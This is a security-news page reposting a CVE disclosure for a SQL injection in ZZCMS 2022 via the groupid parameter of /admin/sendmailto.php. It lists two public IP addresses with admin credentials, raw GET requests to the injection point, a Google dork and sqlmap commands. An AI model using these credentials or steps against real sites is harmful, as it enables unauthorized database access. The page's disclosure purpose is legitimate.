Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-40446: ZZCMS2022 is vulnerable to SQL injection · Issue #4 · liong007/ZZCMS

ZZCMS 2022 was discovered to contain a SQL injection vulnerability via the component /admin/sendmailto.php?tomail=&groupid=.

CVE
Open in Source
#sql#vulnerability#windows#google#ubuntu#git#php

**Exploit Title:**ZZCMS2022 is vulnerable to SQL injection
Google Dork: ZZCMS
Software Link:
https://github.com/liong007/ZZCMS/releases/download/ZZCMS2022/zzcms2022.zip
http://www.zzcms.net/download/zzcms2022.zip
Version: ZZCMS 2022
**Tested on:**Windows Server 2008,Ubuntu
Attack vector(s):
zzcms is a set of content management system (CMS) of China’s zzcms team.
ZZCMS2022 is vulnerable to SQL injection via /admin/sendmailto.php?tomail=&groupid=.
Vendor Homepage: http://www.zzcms.net/about/6.html

Just after deployment, the version is “powered by zzcms2021”

After deployment, it will be automatically upgraded to powered by zzcms2022 the next day

Affected pages:
All pages that contain page “/admin/sendmailto.php?tomail=&groupid=”

For Example :
You need to use an IP address in China to access.
Case 1:
Login http://119.28.176.129/admin
User: admin
Password: 123456

1) click “发E-mail”, click “发送”, Return error “select email from zzcms_user where groupid=1 order by id asc limit 0,2完成”

Condition variables in SQL statement select are not protected by single quotation marks, which may lead to SQL injection vulnerabilities

2) Capturing packets and viewing SQL injection points
GET /admin/sendmailto.php?tomail=&groupid=1&subject=&mailbody=&Submit=%E5%8F%91%E9%80%81 HTTP/1.1
Host: 119.28.176.129

3) Scan with sqlmap
sqlmap.py -r sql2022.txt
The contents of sql2022.txt are as follows:

Sqlmap scan results:

Case 2:
Login http://175.6.210.20:81/admin
User: admin
Password: 123456789qwe

  1. click “发E-mail”, click “发送”, Return error “select email from zzcms_user where groupid=1 order by id asc limit 0,2”

Condition variables in SQL statement select are not protected by single quotation marks, which may lead to SQL injection vulnerabilities

  1. Capturing packets and viewing SQL injection points
    GET /admin/sendmailto.php?tomail=&groupid=1&subject=&mailbody=&Submit=%E5%8F%91%E9%80%81 HTTP/1.1
    Host: 175.6.210.20:81

  2. Scan with sqlmap
    sqlmap.py -r sql2022-2.txt
    The contents of sql2022-2.txt are as follows:

Sqlmap scan results:

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE